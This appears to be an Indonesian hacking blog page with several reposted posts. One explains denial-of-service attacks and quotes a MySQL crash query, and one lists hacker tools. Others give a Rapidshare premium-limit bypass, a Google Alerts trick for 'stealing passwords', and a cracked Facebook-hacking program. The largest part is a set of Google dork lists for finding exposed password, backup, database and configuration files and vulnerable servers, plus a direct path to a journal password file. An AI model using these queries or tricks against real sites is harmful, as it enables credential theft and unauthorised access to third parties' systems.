Rabu, 13 Juli 2011

Hacking

Dalam artikel ini saya akan menjelaskan mengenai jenis serangan yang bisa dikatakan tidak ada obatnya, yaitu denial of service atau DoS. Bila serangan DoS ini dilakukan secara beramai-ramai dan terorganisir dengan baik, maka akan menghasilkan kerusakan yang dahsyat dan sanggup melumpuhkan situs-situs populer seperti twitter.com dan metasploit.com.

Apa itu DoS

Denial of service adalah jenis serangan yang tujuannya adalah mencegah pengguna yang sesungguhnya menikmati layanan yang diberikan server. Server sesuai namanya adalah pelayan yang harus selalu siap melayani permintaan pengguna, yang umumnya beroperasi 24 jam tanpa henti. Contohnya adalah web server yang bertugas melayani pengunjung web menyediakan informasi dalam bentuk halaman html. Dalam kondisi normal, pengunjung dapat meminta resource dari web server untuk ditampilkan dalam browsernya, namun bila web server terkena serangan DoS maka pengunjung tidak bisa menikmati layanan web server.



Secara umum ada 2 cara melakukan serangan DoS:
1. Mematikan Server
2. Menyibukkan Server
* Tanpa bug/vulnerability
* Meng-exploit bug/vulnerability

DoS dengan Mematikan Server: Kill Them!

Anda pernah mengalami ingin memakai telepon umum atau ATM namun tidak bisa karena di mesin tersebut ditempel kertas berisi pesan “Out of Service” atau “Sedang dalam perbaikan”. Telepon umum adalah target serangan DoS yang biasa terjadi, dimana-mana kita menemukan telpon umum yang rusak karena serangan DoS seperti membanting gagang telpon, mencabut kabel, memecahkan LCD dan aksi-aksi lainnya.

Tujuan serangan ini adalah membuat server shutdown, reboot, crash, “not responding”. Jadi serangan ini menghasilkan kerusakan yang sifatnya persisten artinya kondisi DoS akan tetap terjadi walaupun attacker sudah berhenti menyerang, server baru normal kembali setelah di-restart/reboot.

Bagaimana cara serangan DoS ini dilakukan? Serangan ini dilakukan dengan meng-exploit bug/vulnerability pada server. Kata kunci pada vulnerability jenis ini biasanya adalah “specially/carefully crafted packet/request”, yang artinya paket yang dirancang khusus. Kenapa dirancang khusus? Sebab dalam paket itu mengandung sifat tertentu yang membuat server mati ketika mengolah paket khusus itu.

Mari kita perhatikan beberapa contoh vulnerability yang berakibat pada DoS attack:

* Ping of Death ( CA-1996-26 )

Ini adalah jenis bug yang sudah sangat tua. Praktis sudah tidak ada lagi sistem yang vulnerable terhadap bug ini. Bug ini bila diexploit akan membuat server crash, freeze atau reboot. Serangan ini dilakukan dengan mengirimkan “specially crafted” paket berupa oversized ICMP packet, yaitu paket yang ukurannya di atas normal. Ketika server menerima dan memproses paket yang “aneh” ini, maka server akan crash, freeze atau reboot. Ini adalah contoh serangan DoS “one shot one kill” karena bisa merusak server hanya dengan satu tembakan saja.
* MySQL IF Query DoS ( SA25188 )

Bug ini akan membuat mysql server menjadi crash hanya dengan mengirim sql khusus yang mengandung fungsi IF() contohnya: “SELECT id from example WHERE id IN(1, (SELECT IF(1=0,1,2/0)))”. Ini juga jenis serangan “one shot one kill”.

* Cisco Global Site Selector DNS Request Denial of Service (SA33429)

Bug ini membuat DNS server Cisco mati dengan mengirimkan beberapa “specially crafted” paket request DNS dalam urutan tertentu.

Tiga contoh di atas kiranya cukup memberikan gambaran tentang bagaimana serangan DoS jenis ini dilakukan. Pada intinya adalah attacker memanfaatkan (baca:mengexploit) bug yang membuat server berhenti bekerja dan biasanya dilakukan sendirian secara remote dengan mengirimkan specially crafted packet.

DoS dengan Menyibukkan Server: Make Them As Busy As Possible!

Pada waktu menjelang lebaran kita sering merasa begitu sulit mengirim sms, bahkan sering terjadi gagal kirim. Begitu juga ketika berlangsung acara kuis di TV, mengelpon ke nomor untuk menjawab kuis terasa begitu sulit. Hal ini terjadi karena ada begitu banyak orang yang mengirim sms pada saat lebaran dan menelpon pada waktu kuis sehingga membuat jaringan telekomunikasi menjadi begitu sibuk sampai tidak bisa melayani pengguna lain. Peristiwa itu mirip dengan yang terjadi ketika sebuah server mendapat serangan denial of service. DoS yang terjadi pada peristiwa tersebut bukan jenis DoS yang mematikan server, namun jenis DoS yang menyibukkan server.

Jenis DoS ini bersifat sementara, server akan kembali normal bila attacker berhenti mengirimkan request yang membuat sibuk server.

DoS jenis ini terbagi lagi menjadi 2 jenis berdasarkan cara melakukan serangan:

* Exploiting vulnerability: Menyerang dengan malicious request/packet
* No vulnerability exploitation: Menyerang dengan normal request/packet

Membuat server sibuk dengan mengexploitasi vulnerability lebih cepat daripada tanpa mengeksploit vulnerability.

Make Server Busy by Exploiting Vulnerability

Dalam serangan DoS jenis ini, attacker memanfatkan bug yang membuat server berlebihan dalam menggunakan resource (cpu,memory,disk space dsb). Attacker akan mencari cara bagaimana agar membuat server bekerja ekstra keras (jauh lebih keras dari request normal) untuk melayani request dia. Biasanya serangan DoS jenis ini tidak berupa serangan “one shot one kill”. Serangan dilakukan dengan melakukan banyak request dengan setiap request membuat server mengonsumsi lebih banyak resource dari request yang normal.

Dalam hitungan matematika sederhana, bila attacker bisa membuat server bekerja selama 10 detik hanya untuk melayani dia (misal normalnya 0,1 detik), maka attacker bisa mengirimkan request 1.000x untuk membuat server melayani dia selama 10.000 detik (2,7 jam lebih) sehingga membuat pengguna lain tidak bisa menikmati layanan server.

Untuk lebih memahami DoS jenis ini, mari kita lihat contoh-contoh vulnerability yang bisa diexploit untuk melancarkan serangan DoS jenis ini:

* TCP SYN Flood DoS

Ini adalah serangan DoS yang sudah sangat tua. Attacker menyerang dengan cara membanjiri server dengan malicious request berupa paket SYN dengan fake source IP address. SYN packet adalah paket dari client yang mengawali terbentuknya koneksi TCP/IP, setelah itu server akan membalas dengan SYN-ACK, dan dilengkapi dengan paket SYN-ACK-ACK dari client, tiga proses ini disebut three way handshake.

Triknya adalah pada fake source ip address pada paket SYN dari client. Akibatnya server akan mengirim SYN-ACK (step 2) ke ip address yang salah sehingga server juga tidak akan mendapatkan balasan SYN-ACK-ACK dari client. Padahal untuk setiap client yang mencoba membuka koneksi, server akan mengalokasikan resource seperti memori dan waktu untuk menunggu datangnya balasan ACK dari client. Dengan cara ini attacker menghabiskan resource server hanya untuk melayani request palsu dari attacker.
* Apache mod_deflate DoS

Apache menggunakan mod_deflate untuk memampatkan file. Bila visitor meminta sebuah file, maka apache akan menggunakan mod_deflate untuk memampatkannya kemudian mengirimkan ke visitor tersebut. Namun bila di tengah proses pemampatan, visitor memutuskan koneksi TCP, Apache masih terus bekerja memampatkan file untuk visitor yang sebenarnya sudah tidak ada (sudah disconnect). Jadi bugnya adalah pada borosnya pemakaian resource cpu untuk memampatkan file untuk client yang sudah tidak ada.

Attacker memanfaatkan kelemahan ini dengan meminta sebuah file yang berukuran besar, kemudian dalam waktu singkat memutuskan koneksi sehingga membuat server bekerja keras mempatkan file untuk visitor yang sudah tidak ada. Request ini diulang berkali-kali sampai server begitu sibuknya dan semua resource cpu habis.

Dua contoh vulnerability di atas cukup menjelaskan bagaimana serangan DoS jenis ini dilakukan. Pada intinya adalah dengan mengirim banyak malicious request/paket yang membuat server mengonsumsi resource lebih banyak dan lebih lama untuk setiap requestnya.

Make Server Busy Without Exploiting Vulnerability

Ini adalah jenis serangan yang mengandalkan pada kemampuan mengirimkan normal request sebanyak-banyaknya sehingga server menjadi sibuk. Perbedaan DoS jenis ini dengan DoS yang mengexploit vulnerability adalah pada requestnya. Request yang dikirimkan pada DoS jenis ini adalah request yang normal seperti yang dilakukan pengguna biasa, sehingga server tidak mengonsumsi resource berlebihan. Sedangkan DoS yang mengandalkan vulnerability mengirimkan specially crafted malicious request untuk membuat server mengonsumsi resource lebih banyak untuk melayani malicious request tersebut.

Normal request hanya membuat server mengonsumsi resource dalam jumlah biasa-biasa saja, tidak akan mengganggu kerja server secara keseluruhan. Diperlukan normal request dalam jumlah yang sangat banyak untuk membuat server terganggu kerjanya. Jadi agar serangan ini menjadi efektif, maka serangan harus dilakukan beramai-ramai dari banyak tempat, semakin banyak penyerang semakin bagus hasilnya. Serangan ini juga disebut dengan distributed DoS (DDoS) karena dilakukan dari banyak lokasi yang terdistribusi (tersebar).

Serangan DDoS dilakukan dengan menggunakan komputer zombie atau robot. Zombie adalah komputer yang sudah dikuasai attacker sehingga bisa dikendalikan dari jarak jauh. Sekumpulan komputer zombie membentuk jaringan yang disebut bot-net. Attacker mendapatkan banyak zombie dengan menyebarkan virus atau worm, setiap komputer yang terinfeksi akan diinstall program yang membuat komputer bersedia menjalankan perintah dari attacker.
DDoS Botnet AttackCourtesy of: www.dos-attack.net

Gambar di atas menjelaskan cara kerja DDoS. Attacker memberi perintah kepada semua pasukannya untuk membuat request HTTP ke sebuah website. Bila pasukan yang dikuasai attacker sangat besar, maka web server akan dibanjiri request sehingga menjadi terlalu sibuk dan tidak bisa diakses oleh pengguna yang sebenarnya (real visitor).

Serangan jenis ini tidak ada obatnya karena attacker tidak meng-exploit bug atau vulnerability apapun. Bila pada jenis DoS yang lain, serangan dapat dicegah dengan melakukan patching atau update software, maka serangan ini tidak bisa dihentikan dengan update atau patch.

Kesimpulan

Denial of service adalah serangan yang membuat server tidak bisa melayani pengguna yang sesungguhnya. Berikut adalah jenis-jenis serangan DoS berdasarkan cara melakukan serangan:

* Mematikan Server: one shot, one kill untuk membuat server menjadi crash, hang, reboot.
* Menyibukkan Server: mengirim banyak sekali request untuk membuat server sibuk.
o Exploiting bug: mengirim banyak specially crafted request. Jumlah request tidak sebanyak jenis DoS yang menyibukkan server dengan normal request.
o Normal request: mengirim banyak request normal seperti pengguna biasa. Diperlukan jumlah request yang lebih banyak dibandingkan jenis DoS yang menyibukkan server dengan exploit bug. Biasanya menggunakan botnet secara terdistribusi.
Diposkan oleh abdul&upin 0 komentar Link ke posting ini
Login non premium Rapidshare
Ini cara adalah untuk menghindari account premium..
Nanti kalo sudah masuk situsnya ketikkan URL rapid yg mau di-download di situs tersebut..
Moga2 aja bocor terus
Situsnya :
http://www.veryrapidshare.com/PremiumDownload.aspx >>> rekomendasi
Copy paste URL rapid yang ingin anda download di situs itu…
Bisa download sampai 3 kali (promotion codenya ngawur untuk sementara, misal 12345)
Kalau sudah mencapai limit (bila sudah 3 kali biasanya mencatat alamat IP)
Dia meminta promotion code..
alternatifnya :
Lalu anda klik “here” promotion code itu untuk dapetin code itu
(promotion Code tidak bisa di-download dari situs veryrapid). Bisanya dari Rapidshare itu sendiri. tapi tunggu dulu…
Setelah di-klik “here” muncul rapid share pada umumnya. Copy URL address di Rapid tersebut
lalu paste-kan di http://www.evilartix.com/leech2/index.php
dapet deh promotion code-nya..
Lalu balik lagi ke veryrapid
Promotion Code paste-kan di http://www.veryrapidshare.com/PremiumDownload.aspx (situs rekomendasi)
dan beserta URL rapid yg ingin anda download
nb.Promotion Code limitnya 9 kali download (MENCATAT IP). Namun dapat diakses kembali satu hari kemudian..
Berarti total download, tanpa promotion code 3 kali, dengan promotion code 9 kali. 9+3= 12 kali download dalam sehari/ dua hari.
tambahan…
Sebelum mencapai limit 3 kali ada baiknya download terlebih dahulu promotional kode (tercantum di situsnya) tujuannya supaya download dapat kita gunakan secara terus menerus…
Promotion Code valid hanya satu hari, besok akan meminta promotion code yang baru..
Ok sukses….
Diposkan oleh abdul&upin 0 komentar Link ke posting ini
10 Tools Favorit yg Sering Digunakan Para Hacker
Pembuat NMAP melakukan survei 100 tools favorit terhadap pengikut milis nmap-hackers. Sekitar 3,243 user memberikan suaranya untuk tool yang paling mereka gemari. Daftar 100 tool favorit para hacker ini dapat ditemukan jg di www.insecured.org
Dari 100 tool tersebut, berikut dibawah ini adalah 10 tools favorit yang mendapat suara terbanyak sepanjang tahun 2006. Tool tersebut merupakan senjata yang dianggap mutlak diperlukan dalam aktivitas hacking dan sekuriti.
1.Nessus
“Nessus” pertama kali dibuat oleh Renaud Deraison pada tahun 1998 dan disebarkan untuk komunitas internet secara bebas, bermanfaat, ter-update dengan baik serta mudah untuk digunakan.
Nessus adalah sebuah program untuk mencari kelemahan pada sebuah sistem komputer. Menurut situs resminya di www.nessus.org, tool ini telah digunakan oleh lebih dari 75.000 organisasi dan perusahaan di seluruh dunia.
2.Snort
Snort adalah sebuah IDS, yaitu tool untuk mencegah dan mendeteksi serangan terhadap sistem komputer. Vendor dari snort mengklaim bahwa tool ini telah didownload berjuta-juta kali dari situs mereka. Anda mungkin berminat untuk mencobanya, silahkan download tool ini di www.snort.org.
3.Kismet

Kismet adalah sebuah tool untuk mendeteksi koneksi wireless(mendukung lalu lintas 802.11b, 802.11a, dan 802.11g ) , menangkap paket dalam sebuah sistem jaringan dan menjadi sebuah IDS (intrusion detection System).
Untuk mencari tahu lebih lanjut mengenai kismet, anda dapat mengunjungi situs http://www.kismetwireless.net atau masuk ke #kismet irc.freenode.net.
4.Metasploit Framework
Metasploit Framework adalah sebuah proyek open source untuk mengembangkan, menguji dan menggunakan kode eksploit. Dibuat dengan bahasa Perl sebagai fondasi dasar dan dan terdiri dari komponen pelengkap yang telah dicompile dengan bahasa C, assembler dan Python. Metasploit Framework dapat berjalan pada sistem operasi UNIX, Linux dan Windows. Keterangan yang lebih detail dapat anda cari di http://www.metasploit.com.
5.Netcat
Netcat adalah sebuah tool networking utility yang dapat membaca dan menulis data pada koneksi sebuah jaringan melalui protokol TCP/IP.
Fitur yang terdapat pada Netcat antara lain :

Koneksi keluar dan masuk melalui protokol UDP ataupun TCP dengan port yang digunakan..
Tunneling mode, tunneling dari UDP ke TCP, memetakan parameter dalam jaringan (source port/interface, listening port/interface, dan mengijinkan remote host melakukan koneksi ke tunnel)
Port scanner, untuk mendeteksi port yang terbuka.
Buffered send-mode dan hexdump RFC854 telnet.

6.Hping
Hping merupakan sebuah tool serba guna. Tool ini dapat digunakan untuk menguji kemampuan firewall, mencari port yang terbuka, menguji keamanan jaringan dengan menggunakan berbagai jenis protokol, mendapatkan informasi sistem operasi, mengevaluasi protokol TCP/IP.
7.TCPDump
Tcpdump juga merupakan sebuah sniffer. Admin jaringan menggunakan tool ini untuk memonitor lalu lintas dan menganalisa permasalahan jika terjadi gangguan. Menurut informasi di http://www-iepm.slac.stanford.edu/monitoring/passive/tcpdump.html , Tcpdump menggunakan paket filter dari UNIX BSD untuk meng-capture data(BPF / BSD Packet Filter).BPF menerima salinan dari driver pengirim dan penerima paket.Pengguna tcpdump juga dapat menyaring paket sesuai dengan keinginan.
8. John The Ripper
Sebuah password cracker dari jaman nenek moyang para hacker yang masih menjadi 10 besar tool favorit. Berikut adalah keterangan dari pembuat John The Ripper.
“John the Ripper is a password cracker, currently available for UNIX, DOS,WinNT/Win95. Its primary purpose is to detect weak UNIX passwords. It has been tested with Linux x86/Alpha/SPARC, FreeBSD x86, OpenBSD x86, Solaris 2.x SPARC and x86, Digital UNIX, AIX, HP-UX, and IRIX”.
9. Cain And Abel
Cain & Abel adalah sebuah tool untuk masalah password. Tool ini dapat mengumpulkan password dengan metode network sniffing, meng-crack password menggunakan Dictionary attack, Brute-Force and Cryptanalysis attacks, merekam pembicaraan VoIP (Voice Over Internet Protocol), meng-crack jaringan wireless, menganalisa trafik dalam jaringan. www.oxid.it
10. WireShark / Ethereal
Wireshark / Ethereal adalah sebuah tool untuk menganalisa protokol jaringan. Fungsinya juga sebagai sebuah sniffer. Memantau lalu lintas internet. Wireshark
dapat berjalan pada Windows, MAC OS X, dan Linux. www.wireshark.org
Tertarik? Pelajari dan pahami saja cara penggunaan 10 tool tsb. Kita memang tdk akan semudah itu menjadi hacker hebat hanya dengan mengandalkan 10 tool diatas. Tapi tool2 tsb sudah diakui oleh semua tingkatan Hacker. Kan bisa menjadi tambahan bagi anda2 yang ingin menggeluti sekuriti komputer secara mendalam.
Diposkan oleh abdul&upin 0 komentar Link ke posting ini
Mencuri password berbagai situs
maaf ini bukan untuk mengajari hal hal yang negatif,just share aja ...dan mohon di gunakan sebagaimana mestinya.....
oke...langsung aja....

Caranya gampang banget kok, karena kita akan memanfaatkan jasa mbah google...

Dan yg perlu diinget cara ini butuh kesabaran...



Pertama buka dibrowser kamu

Code:

http://www.google.com/alerts

kemudian akan muncul "Create a Google Alert"

isi "Search terms" dgn format sbb :

Code:

@www.nama_situs.com/members/

atau

@members.nama_situs.com

atau

@http://members.nama_situs.com

ganti nama_situs dgn situs yg ingin kalian cari passwordnya...


kemudian pada "Type" pilih "News" atau "web".

pada "How Often" pilih "once a day"

kemudian isi email kamu di "your email"


Setelah itu tinggal tunggu deh...
Diposkan oleh abdul&upin 0 komentar Link ke posting ini
Login non premium Rapidshare

bisa download sampe 12 x per hari rapidshare hack
Ini cara adalah untuk menghindari account premium..
Nanti kalo sudah masuk situsnya ketikkan URL rapid yg mau di-download di situs tersebut.. Moga2 aja bocor terus
Situsnya :

veryrapidshare >><< rekomendasi Copy paste URL rapid yang ingin anda download di situs itu… Bisa download sampai 3 kali (promotion codenya ngawur untuk sementara, misal 12345) Kalau sudah mencapai limit (bila sudah 3 kali biasanya mencatat alamat IP) Dia meminta promotion code.. alternatifnya : Lalu anda klik “here” promotion code itu untuk dapetin code itu (promotion Code tidak bisa di-download dari situs veryrapid). Bisanya dari Rapidshare itu sendiri. tapi tunggu dulu… Setelah di-klik “here” muncul rapid share pada umumnya. Copy URL address di Rapid tersebut lalu paste-kan di evilartix dapet deh promotion code-nya.. Lalu balik lagi ke veryrapid Promotion Code paste-kan di (situs rekomendasi) dan beserta URL rapid yg ingin anda download nb.Promotion Code limitnya 9 kali download (MENCATAT IP). Namun dapat diakses kembali satu hari kemudian.. Berarti total download, tanpa promotion code 3 kali, dengan promotion code 9 kali. 9+3= 12 kali download dalam sehari/ dua hari. tambahan… Sebelum mencapai limit 3 kali ada baiknya download terlebih dahulu promotional kode (tercantum di situsnya) tujuannya supaya download dapat kita gunakan secara terus menerus… Diposkan oleh abdul&upin 0 komentar Link ke posting ini Hack facebook MAU HACK FB ORANG dengan memberikan ID dan Password kita, ;)) sepertinya bunuh diri ya..kkkkkkk... ada nih, program berbayar tapi sudah di PATCH... syaratnya masukkan ID korban aja. dan isi IP FB, gak perlu isi ID dan PASS kita.... aman tooh..download ndek sini lengkap dengan passwordnya. jadi gak perlu bayar lagi..kkkkkkkk tapi kalo cuma karna chip poker, mending gak usah HACK FB orang deh, kasihan.. pake BOT POKER ZYNGA aja, 80% Menang kok, tanpa nyakitin siapapun.. link BOT POKER ZYNGA FINAL EDITION 2010 : ndek keneGOODLUCK YA. Diposkan oleh abdul&upin 0 komentar Link ke posting ini Pencurian Data pada Web Server Internet memang memberi kita banyak kemudahan. Salah satunya dengan memanfaatkan web server. Pada web server kita dapat menyimpan data dan dokumen dan bisa kita akses kapanpun darimanapun dengan menggunakan akses internet. Menyimpan data di webserver banyak dilakukan karena membantu mobilitas kerja.Namun demikian, kemudahan itu tidak sesederhana dengan apa yang kita lihat. Data yang tersimpan pada web server memiliki potensi besar untuk dibaca bahkan dicuri oleh orang lain. Bagaimana jika data tersebut merupakan dokumen penting dari perusahaan yang tidak boleh diketahui oleh orang lain? Lebih-lebih jika perusahaan kompetitor menyewa seorang hacker untuk mencuri data di web server perusahaan kita. Bahaya. Pertanyaannya adalah apakah pencurian ini bisa terjadi? Jawabannya memang relatif. Tetapi bukan berarti data tersebut dijamin tidak bisa diakses oleh orang yang tidak kita ijinkan. Dengan teknologi segala sesuatunya menjadi mungkin. Di internet, pencurian data dapat dilakukan dengan cara yang cukup mudah, bahkan bisa dilakukan dengan menggunakan teknik dasar yang sederhana. Boleh percaya boleh tidak, orang dapat melakukan pencurian data hanya dengan menggunakan search engine. Tulisan berikutnya tidak bermaksud untuk mengajarkan cara untuk melakukan pencurian data, tetapi lebih kepada update knowledge agar kita dapat melakukan pencegahan pencurian data milik kita yang tersimpan dalam web server. Dengan teknik berikut kita akan melakukan pengujian dengan apa yang dikenal oleh orang orang dari komunitas ’underground’ sebagai Teknik Traversal. Dalam konteks ini teknik traversal secara sederhana dapat diartikan sebagai ”melintas” suatu tempat. Tentunya tempat yang dimaksud adalah server penyimpan data. Mereka dapat menggunakan teknik traversal untuk mengembangkan kesempatan yang kecil menjadi kemungkinan yang jauh lebih besar. Sebagai ilustrasi, dengan mengetahui bagaimana teknik traversal dapat melakukan pencurian data, mari kita buktikan apa yang dapat dilakukan oleh teknik ini. Kita dapat menggunakan search engine Google (www.google.com) untuk memulainya. Pada layar Google, ketikan query code berikut: intitle:index.of inurl:”/admin/*”. Dalam waktu sekejap, Google akan memberikan ribuan hasil pencarian berisi situs-situs yang menampilkan folder admin. Gambaran tsbt adalah hasil dari query yang kita minta pada Google. Pilihlah salah satu URL tersebut lalu mengkliknya. Tampilan yang dihasilkan merupakan direktori paling dasar dari result yang dihasilkan oleh teknik traversal. Mereka dapat eksplorasi tiap dan semua directory, subdirektori bahkan ke direktori admin untuk mencari file yang mereka inginkan. Dengan melakukan kombinasi dan modifikasi pada query pada engine Google mereka dapat lebih leluasa untuk berjalan-jalan pada situs target. Misalnya dengan mengganti kata “admin” menjadi “student” atau “public”. Kelebihan lainnya dari teknik traversal ini akan mengijinkan mereka untuk memanfaatkan ‘cacat’ yang ada pada webserver dan berkeliling ke pohon direktori di luar direktori web server. Sebagai contoh, jika web server terinstall di dalam direktori /var/www dan data publik ditempatkan di direktori /var/www/htdocs, secara default mereka yang melakukan serangan pada top level directory pada web server dapat melihat file yang ditempatkan di /var/www/htdocs. Pada keadaan normal, web server tidak akan menginjinkan orang untuk melihat file yang ditempatkan pada direktori /var atau direktori /var/www. Tapi dengan menggunakan kombinasi query, masih banyak web server yang menginjinkan mereka untuk berjalan-jalan di dalamnya. Coba kita kita pilih salah satu URL link yang dihasilkan oleh Google. Kita dapat bereksplorasi di dalamnya bukan? Bahkan kita bisa masuk ke dalam subdirektori user. Cobalah dibayangkan saat ini Anda sedang ’berjalan-jalan’ pada web server milik sendiri dimana Anda menyimpan data-data penting di dalamnya. Sekali lagi saya katakan bahwa dengan teknik yang sederhana seperti itu saja bisa melakukan pencurian data, apalagi jika mereka menggunakan teknik yang lebih tinggi. Jangankan data dalam web server, data yang ada didalam komputer pribadi kita pun bisa saja dicuri. Sebagai informasi tambahan, di internet bahkan banyak sekali tools yang dapat dipergunakan untuk membantu melakukan pencurian data. Untuk lebih jelas tentang hal ini, ada baiknya Anda memperdalam pengetahuan mengenai web security. Dengan demikian kita bisa melakukan tindakan pencegahan pencurian data baik di web server maupun data di komputer pribadi kita. Untuk itu kita dapat mencari informasi dari situs yang terkait dengan web security. Bagi Anda yang sering menyimpan data di web server (pengguna saja) sebaiknya mendiskusikan hal ini ke bagian technical support agar dapat melakukan pencegahan dari tindakan pencurian. Diposkan oleh abdul&upin 0 komentar Link ke posting ini Hacking via mbah GOOGLE Diam diam, site ini memberikan kita tools untuk melakukan hacking yang paling berbahaya se antero dunia, walaupun tools google ini hanya bisa memberikan sampai ke level footprinting ada juga yang bisa sampai ke level selanjutnya. kenapa aku sebut dengan tools ? karna kita menggunakan google untuk mencari media yang unsecure, yang mudah di hack yang bolong, yang belum ter update, karna google memiliki kekuatan untuk itu semua. dari catatn ini yang akan didapatkan adalah: * Bagaimana cara menggunakan google untuk mencari sources dari personal information dan confidential data lainya * Bagaimana cara mencari informasi tentang vulnerable systems and Web services * Bagaimana cara mencari publicly available network devices. Hal pertama dari yang harus di ketahui adalah Google Query Operators Query operator ini berfungsi kasar sebagai filtering search nya google menjadi lebih spesifik berdasarkan query yang kita inginkan, masing masing query memiliki fungsi sendiri sendiri. berikut keterangan dan contong nya…. site memfilter berdasarkan domain yang ada contoh: site:google.com fox —> akan mencari kata fox di situs google.com

intitle
Memfilter dokumen yang memiliki title yang spesifik
contoh: intitle:fox fire —> akan mencari semua site yang ada kata fox dan didalamnya terdapat teks fire

allintitle
Memfilter dokumen untuk mencari intitle intile
contoh: allintitle:fox fire —> akan mencari semua site yang memiliki title fox dan yang memiliki title fire atau = intitle:fox intitle:fire

inurl
Memfilter pencarian dengan url yang spesifik
contoh: inurl:fox fire —> akan mencari kata fire di website yang url nya terdapat fox

allinurl
Sama dengan Allintitle (hanya ini url)

filetype, ext
Memfilter pencarian untuk dokumen yang spesifik
contoh: filetype:pdf fire —> akan mencari file PDF yang didalamnya terdapat kata fire

contoh keren: filetype:doc skripsi IT

numrange
Memfilter dokumen berdasarkan range tertentu
contoh: numrange:1-100 fire —> akan mencari range 1-100 yang terdapat kata fire

link
Memfilter site site yang memiliki link terhadap site tertentu
contoh: link:www.google.com —> akan mencari site site mana aja yang memiliki links ke google.com

inanchor
Memfilter berdasarkan site description yang ada
contoh: inanchor:fire —> akan mencari web yang memiliki deskripsi fire

kira kira itulah query query google yang keren keren, sisanya ada sih, seperti:
/ * - + “” ( ya ini regular ekspression biasa kan, jadi ngga perlu di jelaskan lebih detail )

nah, dari situ, kia bisa kreasikan ke berbagai macam jenis query untuk memfilter sesuatu, bahkan ke sesuatu yang lebih dalam, misalnya file database……

Web Server
untuk mencari target dengan mudah dilakukan google dengan menggunakan sintaks berikut ini:
“Apache/1.3.28 Server at” intitle:index.of
–> Apache 1.3.28

“Apache/2.0 Server at” intitle:index.of
–> Apache 2.0

“Apache/* Server at” intitle:index.of
–> semua versi dari Apache

“Microsoft-IIS/4.0 Server at” intitle:index.of
–> Microsoft Internet Information Services 4.0

“Microsoft-IIS/5.0 Server at” intitle:index.of
–> Microsoft Internet Information Services 5.0

“Microsoft-IIS/6.0 Server at” intitle:index.of
–> Microsoft Internet Information Services 6.0

“Microsoft-IIS/* Server at” intitle:index.of
–> semua versi dari Microsoft Internet Information Services

“Oracle HTTP Server/* Server at” intitle:index.of
–> semua versi dari Oracle HTTP Server

“IBM _ HTTP _ Server/* * Server at” intitle:index.of
–> semua versi dari IBM HTTP Server

“Netscape/* Server at” intitle:index.of
–> semua versi dari Netscape Server

“Red Hat Secure/*” intitle:index.of
–> semua versi dari the Red Hat Secure server

“HP Apache-based Web Server/*” intitle:index.of
–> semua versi dari the HP server

Beberapa Bug pada Skripts dapat ditemukan google:
“Generated by phpSystem”
–> dapat menemukan operating system type and version, hardware configuration, logged users, open connections, free memory dan disk space, mount points

“This summary was generated by wwwstat”
–> web server statistics, system file structure

“These statistics were produced by getstats”
–>web server statistics, system file structure

“This report was generated by WebLog”
–>web server statistics, system file structure

intext:”Tobias Oetiker” “traffic analysis”
–>system performance statistics as MRTG charts, network configuration

intitle:”Apache::Status” (inurl:server-status | inurl:status.html | inurl:apache.html)
–>server version, operating system type, child process list,current connections

intitle:”ASP Stats Generator *.*” “
–>ASP Stats

Generator” “2003-2004 weppos”
–>web server activity, lots of visitor information

intitle:”Multimon UPS status page”
–>UPS device performance statistics

intitle:”statistics of” “advanced web statistics”
–>web server statistics, visitor information

intitle:”System Statistics” +”System and Network Information Center”
–>system performance statistics as MRTG charts, hardware configuration, running services

intitle:”Usage Statistics for” “Generated by Webalizer”
–>web server statistics, visitor information, system file structure

intitle:”Web Server Statistics for ****”
–>web server statistics, visitor information

inurl:”/axs/ax-admin.pl” -script
–>web server statistics, visitor information

inurl:”/cricket/grapher.cgi”
–>MRTG charts of network interface performance

inurl:server-info “Apache Server Information”
–>web server version and configuration, operating system type, system file structure

“Output produced by SysWatch *”
–>operating system type and version, logged users, free memory and disk space, mount points, running processes,system logs

Error message queries
Salah satu kumpulan error message query, dapat ditemukan sehingga kita bisa mulai melakukan hacking pada tahap selanjutnya.

“A syntax error has occurred” filetype:ihtml
–>Informix database errors, berpotensial untuk mengambil function names, filenames, file structure information, pieces of SQL code and passwords

“Access denied for user” “Using password”
–>authorisation errors, berpotensial untuk mengambil user names, function names, file structure information and pieces of SQL code

“The script whose uid is ” “is not allowed to access”
–>access-related PHP errors, berpotensial untuk mengambil filenames, function names and file structure information

“ORA-00921: unexpected end of SQL command”
–>Oracle database errors, berpotensial untuk mengambil filenames, function names and file structure information

“error found handling the request” cocoon filetype:xml
–>Cocoon errors, berpotensial untuk mengambil Cocoon version information, filenames, function names and file structure information

“Invision Power Board Database Error”
–>Invision Power Board bulletin board errors, berpotensial untuk mengambil function names, filenames, file structure information and piece of SQL code

“Warning: mysql _ query()” “invalid query”
–>MySQL database errors, berpotensial untuk mengambil user names, function names, filenames and file structure information

“Error Message : Error loading required libraries.”
–>CGI script errors, berpotensial untuk mengambil information about operating system and program versions, user names, filenames and file structure information

“#mysql dump” filetype:sql
–>MySQL database errors, berpotensial untuk mengambil informasi database structure dan contents

Google queries untuk mencari lokasi passwords
kumpulan secara garis besar lokasi password sebuah sistem yang dapat diakses oleh google

“http://*:*@www”
site passwords for site, stored as the string

“http://username: password@www…” filetype:bak inurl:”htaccess|passwd|shadow|ht users”
file backups, berpotensial untuk mengambil user names and passwords

filetype:mdb inurl:”account|users|admin|administrators|passwd|password”
mdb files, berpotensial untuk mengambil password information

intitle:”Index of” pwd.db
pwd.db files, berpotensial untuk mengambil user names and encrypted passwords

inurl:admin inurl:backup intitle:index.of
directories whose names contain the words admin and backup

“Index of/” “Parent Directory” “WS _ FTP.ini” filetype:ini WS _ FTP PWD
WS_FTP configuration files, berpotensial untuk mengambil FTP server access passwords

ext:pwd inurl:(service|authors|administrators|users) “# -FrontPage-”
Terdapat Microsoft FrontPage passwords

filetype:sql (”passwd values ****” |”password values ****” | “pass values ****” )
Terdapat SQL code and passwords yang disimpan dalam a database

intitle:index.of trillian.ini
configuration files for the Trillian IM

eggdrop filetype:user
user configuration files for the Eggdrop ircbot

filetype:conf slapd.conf configuration files for OpenLDAP

inurl:”wvdial.conf” intext:”password” configuration files for WV Dial

ext:ini eudora.ini configuration files for the Eudora mail client

filetype:mdb inurl:users.mdb
Microsoft Access files, berpotensial untuk mengambil user account information

intext:”powered by Web Wiz Journal”
websites using Web Wiz Journal, which in its standard configuration allows access to the passwords file – just enter http:///journal/journal.mdb instead of the default http:///journal/

“Powered by DUclassified” -site:duware.com
“Powered by DUcalendar” -site:duware.com
“Powered by DUdirectory” -site:duware.com
“Powered by DUclassmate” -site:duware.com
